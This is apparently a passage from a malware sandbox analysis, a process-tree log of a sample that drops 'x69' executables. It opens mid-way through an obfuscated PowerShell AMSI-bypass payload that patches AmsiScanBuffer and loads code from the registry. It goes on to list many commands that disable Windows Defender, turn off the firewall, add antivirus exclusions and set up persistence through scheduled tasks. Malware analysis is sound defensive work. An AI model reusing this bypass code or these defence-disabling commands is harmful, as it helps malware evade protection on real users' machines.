Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+'e'+'g'+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$uDkKYAhAQbC.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$JSPZKwpHVeqSXx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');$uDkKYAhAQbC.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+'o'+[Char](116)+''+','+''+[Char](86)+'ir'+[Char](116)+'ua'+[Char](108)+'',$jjPceJbftj,$JSPZKwpHVeqSXx).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'nag'+[Char](101)+''+'d'+'');Write-Output $uDkKYAhAQbC.CreateType();}$CzlBVZNNSzOuQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in32.'+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$snQizwzteddOkc=$CzlBVZNNSzOuQ.GetMethod(''+'G'+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JhVzOlVkXFqTcTVCqXc=MVKPIfBtMWRx @([String])([IntPtr]);$ocDMZvbhOPeJKYGXuVrEyf=MVKPIfBtMWRx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UKEUneCuLbV=$CzlBVZNNSzOuQ.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'l'+'l'+'')));$FyEjhXWLyFHIWH=$snQizwzteddOkc.Invoke($Null,@([Object]$UKEUneCuLbV,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+'y'+'A'+'')));$ieCZrJiapcTQeFbKO=$snQizwzteddOkc.Invoke($Null,@([Object]$UKEUneCuLbV,[Object]('V'+'i'+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$oeMfxAC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FyEjhXWLyFHIWH,$JhVzOlVkXFqTcTVCqXc).Invoke('a'+'m'+'s'+[Char](105)+'.'+'d'+''+[Char](108)+'l');$JjvGvEePuwNbBqKyn=$snQizwzteddOkc.Invoke($Null,@([Object]$oeMfxAC,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+'a'+[Char](110)+'B'+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$BUYxZhNXwZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf).Invoke($JjvGvEePuwNbBqKyn,[uint32]8,4,[ref]$BUYxZhNXwZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JjvGvEePuwNbBqKyn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf).Invoke($JjvGvEePuwNbBqKyn,[uint32]8,0x20,[ref]$BUYxZhNXwZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:5336
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:1560
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:2392
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1436
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2592
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1976
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1848
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2776
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3004
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4008
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:724
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C42.tmp\8C43.tmp\8C44.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:5532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4224 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:2712
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4612 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:3244
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4836 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1876
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:1728
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:3592
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:3324
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1236
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5640
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2244
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4484
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2720
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:2292
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:3368
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:3064
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:3708
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4504
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:2900
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:940
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:2916
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:3808
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:5148
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:4972
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:752
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3104
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5912
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:1384
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:2016
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1084
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:4876
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:3852
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:516
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3428
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6dc706d6.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:1668
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1956
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exeC:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7b925020.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4392
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D4C.tmp\8D4D.tmp\8D4E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
